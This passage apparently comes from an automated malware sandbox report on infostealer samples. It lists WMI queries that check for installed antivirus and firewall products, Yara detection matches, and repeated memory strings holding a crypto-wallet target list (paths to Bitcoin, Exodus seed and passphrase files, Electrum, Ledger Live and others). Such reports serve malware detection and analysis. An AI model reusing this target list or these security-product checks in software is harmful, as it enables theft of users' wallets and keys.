                                Source: VP2pdCInvS.exe, 0000000B.00000002.2251924759.00000000075C9000.00000004.00000020.00020000.00000000.sdmp, VP2pdCInvS.exe, 0000000B.00000002.2251792775.00000000075B5000.00000004.00000020.00020000.00000000.sdmp, VP2pdCInvS.exe, 0000000B.00000002.2229976098.0000000000F36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                Source: Amcache.hve.8.drBinary or memory string: MsMpEng.exe
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                                Stealing of Sensitive Information

                                barindex
                                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                Source: Yara matchFile source: 22.0.Freshbuild.exe.870000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 24.0.Hkbsse.exe.e00000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 22.2.Freshbuild.exe.870000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 24.2.Hkbsse.exe.e00000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.mlk3kK6uLZ.exe.b0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 23.0.Hkbsse.exe.e00000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 26.2.Hkbsse.exe.e00000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 23.2.Hkbsse.exe.e00000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 26.0.Hkbsse.exe.e00000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.axplong.exe.9c0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.2.axplong.exe.9c0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000003.00000003.2036875774.0000000004B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000017.00000000.2792505057.0000000000E01000.00000020.00000001.01000000.00000019.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000002.4452228796.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000003.2036537353.00000000051A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000017.00000002.4455767208.0000000000E01000.00000020.00000001.01000000.00000019.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.2042832211.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000016.00000002.2795620246.0000000000871000.00000020.00000001.01000000.00000016.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000016.00000000.2774604502.0000000000871000.00000020.00000001.01000000.00000016.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.2077451585.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.3861449673.0000000000E01000.00000020.00000001.01000000.00000019.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.3260194667.0000000000E01000.00000020.00000001.01000000.00000019.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000000.3849994852.0000000000E01000.00000020.00000001.01000000.00000019.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000000.3249458796.0000000000E01000.00000020.00000001.01000000.00000019.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.2002501733.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 18.2.hello.exe.6c3a3000.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.2.hello.exe.6c380000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 20.2.aspnet_regiis.exe.400000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 20.2.aspnet_regiis.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.2.hello.exe.6c3a3000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000012.00000002.2679727829.000000006C3A3000.00000004.00000001.01000000.00000014.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.2811418680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 5.2.RegAsm.exe.482040.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.RegAsm.exe.482040.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.0.Z73fDV6g4L.exe.aa0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000005.00000002.2098178516.0000000000479000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000000.2094530359.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exe, type: DROPPED
                                Source: Yara matchFile source: 42.2.svchost.exe.1b0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 38.2.FRaqbC8wSA1XvpFVjCRGryWt.exe.f60000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000002A.00000002.4452302176.00000000001B2000.00000040.00000001.01000000.00000020.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000003.4159859843.0000000005800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000002.4134787389.0000000000F62000.00000040.00000001.01000000.0000001F.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000003.4083127627.0000000005770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: FRaqbC8wSA1XvpFVjCRGryWt.exe PID: 2020, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1772, type: MEMORYSTR
                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                Source: Yara matchFile source: 5.2.RegAsm.exe.436040.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.0.VP2pdCInvS.exe.890000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 25.0.newstart.exe.ec0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.RegAsm.exe.436040.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000000B.00000000.2095785467.0000000000892000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000019.00000000.3774634677.0000000000EC2000.00000002.00000001.01000000.0000001A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6768, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: Z73fDV6g4L.exe PID: 6220, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: VP2pdCInvS.exe PID: 4512, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: newstart.exe PID: 2672, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: see.exe PID: 1868, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exe, type: DROPPED
                                Source: Yara matchFile source: 00000014.00000002.2813138912.00000000032D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7464, type: MEMORYSTR
                                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                Source: Yara matchFile source: 18.2.hello.exe.6c3a3000.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.2.hello.exe.6c380000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 20.2.aspnet_regiis.exe.400000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 20.2.aspnet_regiis.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.2.hello.exe.6c3a3000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000012.00000002.2679727829.000000006C3A3000.00000004.00000001.01000000.00000014.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.2811418680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7464, type: MEMORYSTR
                                Source: Yara matchFile source: 5.2.RegAsm.exe.482040.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.0.Z73fDV6g4L.exe.aa0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.RegAsm.exe.482040.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exe, type: DROPPED
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002DD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\walletsLR]q`^
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.00000000033BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002DD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $]q2C:\Users\user\AppData\Roaming\Electrum\wallets\*
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002DBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: cjelfplplebdjjenllpjcblmjkfcffne|JaxxxLiberty
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.00000000033BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.00000000033BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002DD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.walletLR]q
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.00000000033BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.00000000033BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.00000000033BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.00000000033BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002DD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum\walletsLR]q
